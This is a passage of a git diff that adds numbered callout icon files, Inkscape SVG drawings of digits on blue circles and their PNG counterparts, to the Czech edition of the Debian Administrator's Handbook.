0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.148054,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.207519,1.137207 -0.132821,0.33204 -0.318205,0.625334 -0.556153,0.879883 -0.232429,0.249031 -0.509121,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979486,0.121751 1.721021,0.420579 2.22461,0.896485 0.503572,0.470382 0.755362,1.106775 0.755371,1.909179 -9e-6,0.531253 -0.09685,1.023766 -0.290528,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879882,1.170411 -0.392911,0.332031 -0.890958,0.592122 -1.494141,0.780273 -0.597662,0.182617 -1.303227,0.273926 -2.116699,0.273926 -0.652998,0 -1.267256,-0.05534 -1.842774,-0.166016 -0.575522,-0.105143 -1.112305,-0.268392 -1.610351,-0.489746 l 0,-2.183105 c 0.249022,0.132815 0.51188,0.249025 0.788574,0.348632 0.276691,0.09961 0.553384,0.185387 0.830078,0.257325 0.27669,0.06641 0.547849,0.116212 0.813477,0.149414 0.271155,0.0332 0.525712,0.04981 0.763671,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315425,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188146,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124512,-0.73877 -7e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.20474 -0.265631,-0.376289 -0.498047,-0.51464 -0.226893,-0.143876 -0.525721,-0.254553 -0.896485,-0.332032 -0.370772,-0.07747 -0.827315,-0.116205 -1.369628,-0.116211 l -0.863282,0 0,-1.801269 0.84668,0 c 0.509111,7e-6 0.93245,-0.04426 1.270019,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124512,-0.672363 -6e-6,-0.431632 -0.135585,-0.769197 -0.406739,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,1e-5 -0.514652,0.02768 -0.747071,0.08301 -0.226891,0.04981 -0.439944,0.116221 -0.63916,0.199218 -0.193687,0.07748 -0.373537,0.166026 -0.53955,0.265625 -0.160484,0.09409 -0.307131,0.188161 -0.439942,0.282227 l -1.294922,-1.709961 c 0.232421,-0.171538 0.484212,-0.329253 0.755371,-0.473145 0.276692,-0.143868 0.575519,-0.26838 0.896485,-0.373535 0.320961,-0.1106647 0.666826,-0.1964393 1.037597,-0.2573239 0.370765,-0.06086 0.766435,-0.091296 1.187012,-0.091309 0.597651,1.23e-5 1.139969,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/34.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/34.png
new file mode 100644
index 000000000..ba4435253
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/34.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/34.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/34.svg
new file mode 100644
index 000000000..7bbdf5b9a
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/34.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.803816,19.493301 -1.460938,0 0,2.515137 -2.498535,0 0,-2.515137 -5.013672,0 0,-1.784668 5.154785,-7.8359371 2.357422,0 0,7.6284181 1.460938,0 0,1.992187 m -3.959473,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09961,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.121749,0.2601 -0.262862,0.520191 -0.42334,0.780274 l -2.02539,3.071289 2.755859,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/35.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/35.png
new file mode 100644
index 000000000..21d4575cf
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/35.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/35.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/35.svg
new file mode 100644
index 000000000..8e19553af
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/35.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.761335,14.255508 c 0.520177,8e-6 1.004389,0.08025 1.452637,0.240723 0.448235,0.160489 0.838372,0.395678 1.17041,0.705566 0.332024,0.309903 0.592114,0.697272 0.780274,1.16211 0.188142,0.459315 0.282218,0.987797 0.282226,1.585449 -8e-6,0.658532 -0.102385,1.250654 -0.307129,1.776367 -0.20476,0.520184 -0.506355,0.962892 -0.904785,1.328125 -0.398444,0.359701 -0.893724,0.636394 -1.48584,0.830078 -0.586594,0.193685 -1.261723,0.290528 -2.02539,0.290528 -0.304366,0 -0.605961,-0.01384 -0.904785,-0.0415 -0.298831,-0.02767 -0.586591,-0.06917 -0.863282,-0.124512 -0.27116,-0.04981 -0.531251,-0.116211 -0.780273,-0.199219 -0.243491,-0.08301 -0.464845,-0.17985 -0.664063,-0.290527 l 0,-2.216309 c 0.193684,0.11068 0.417805,0.215823 0.672364,0.31543 0.254555,0.09408 0.517413,0.177086 0.788574,0.249024 0.27669,0.06641 0.553383,0.121746 0.830078,0.166015 0.276689,0.03874 0.539547,0.05811 0.788574,0.05811 0.741532,2e-6 1.305985,-0.152179 1.69336,-0.456543 0.387364,-0.309893 0.581048,-0.799639 0.581054,-1.469239 -6e-6,-0.597651 -0.190924,-1.051427 -0.572754,-1.361328 -0.376307,-0.315424 -0.960128,-0.473139 -1.751464,-0.473144 -0.143884,5e-6 -0.298832,0.0083 -0.464844,0.0249 -0.160485,0.01661 -0.320967,0.03874 -0.481446,0.06641 -0.15495,0.02768 -0.304364,0.05811 -0.448242,0.09131 -0.143882,0.02767 -0.268394,0.05811 -0.373535,0.09131 l -1.020996,-0.547852 0.456543,-6.1840821 6.408203,0 0,2.1748051 -4.183594,0 -0.199218,2.382324 c 0.177079,-0.03873 0.381832,-0.07747 0.614257,-0.116211 0.237952,-0.03873 0.542314,-0.0581 0.913086,-0.05811"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/36.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/36.png
new file mode 100644
index 000000000..b5402b577
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/36.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/36.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/36.svg
new file mode 100644
index 000000000..d364dbf51
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/36.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 16.428328,16.853653 c -1e-6,-0.581049 0.03044,-1.159336 0.09131,-1.734863 0.06641,-0.575514 0.17985,-1.126132 0.340332,-1.651856 0.166015,-0.531241 0.387369,-1.023753 0.664063,-1.477539 0.282224,-0.453765 0.636391,-0.846669 1.0625,-1.178711 0.431637,-0.337553 0.946285,-0.600411 1.543945,-0.788574 0.603185,-0.1936727 1.305984,-0.2905151 2.108398,-0.2905274 0.116205,1.23e-5 0.243483,0.00278 0.381836,0.0083 0.13834,0.00555 0.276686,0.013847 0.415039,0.024902 0.143873,0.00555 0.282219,0.016614 0.415039,0.033203 0.132805,0.016614 0.251783,0.035982 0.356934,0.058105 l 0,2.0502924 c -0.210294,-0.04979 -0.434415,-0.08853 -0.672363,-0.116211 -0.232429,-0.03319 -0.467618,-0.04979 -0.705567,-0.0498 -0.747076,1e-5 -1.361333,0.09408 -1.842773,0.282226 -0.48145,0.182627 -0.863285,0.439951 -1.145508,0.771973 -0.28223,0.33204 -0.484215,0.730477 -0.605957,1.195312 -0.116214,0.464852 -0.188154,0.9795 -0.21582,1.543946 l 0.09961,0 c 0.110674,-0.199212 0.243487,-0.384596 0.398438,-0.556153 0.160478,-0.177076 0.345862,-0.32649 0.556152,-0.448242 0.210282,-0.127271 0.445471,-0.22688 0.705566,-0.298828 0.265621,-0.07193 0.561681,-0.107902 0.888184,-0.10791 0.52571,8e-6 0.998854,0.08578 1.419434,0.257324 0.420565,0.171557 0.774732,0.42058 1.0625,0.74707 0.293286,0.326504 0.517407,0.727708 0.672363,1.203614 0.154939,0.475916 0.232413,1.021 0.232422,1.635254 -9e-6,0.658532 -0.09408,1.247887 -0.282227,1.768066 -0.182625,0.520184 -0.445483,0.962892 -0.788574,1.328125 -0.343106,0.359701 -0.758145,0.636394 -1.245117,0.830078 -0.486985,0.188151 -1.034836,0.282227 -1.643555,0.282227 -0.59766,0 -1.156579,-0.105144 -1.676758,-0.31543 -0.520185,-0.21582 -0.97396,-0.542317 -1.361328,-0.979492 -0.381837,-0.437173 -0.683432,-0.987791 -0.904785,-1.651856 -0.215821,-0.669593 -0.323731,-1.460933 -0.32373,-2.374023 m 4.216796,3.270508 c 0.226883,2e-6 0.431636,-0.0415 0.614258,-0.124512 0.188146,-0.08854 0.348627,-0.218585 0.481446,-0.390137 0.13834,-0.17708 0.243483,-0.398434 0.315429,-0.664062 0.07747,-0.265622 0.116205,-0.581051 0.116211,-0.946289 -6e-6,-0.592118 -0.124518,-1.056961 -0.373535,-1.394531 -0.243495,-0.343094 -0.61703,-0.514643 -1.120605,-0.514649 -0.254562,6e-6 -0.486984,0.04981 -0.697266,0.149414 -0.21029,0.09962 -0.390141,0.229661 -0.539551,0.390137 -0.149417,0.160487 -0.265628,0.340337 -0.348633,0.539551 -0.07748,0.199223 -0.116214,0.401209 -0.116211,0.605957 -3e-6,0.28223 0.0332,0.564456 0.09961,0.846679 0.07194,0.276696 0.17708,0.528486 0.315429,0.755371 0.143877,0.221357 0.318193,0.401207 0.52295,0.539551 0.210282,0.138349 0.453771,0.207522 0.730468,0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/37.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/37.png
new file mode 100644
index 000000000..9fd99d220
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/37.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/37.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/37.svg
new file mode 100644
index 000000000..771fa4d11
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/37.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 17.51573,22.008438 4.316406,-9.960937 -5.578125,0 0,-2.1582035 8.367188,0 0,1.6103515 -4.424317,10.508789 -2.681152,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/38.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/38.png
new file mode 100644
index 000000000..3ce6027f0
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/38.png differ
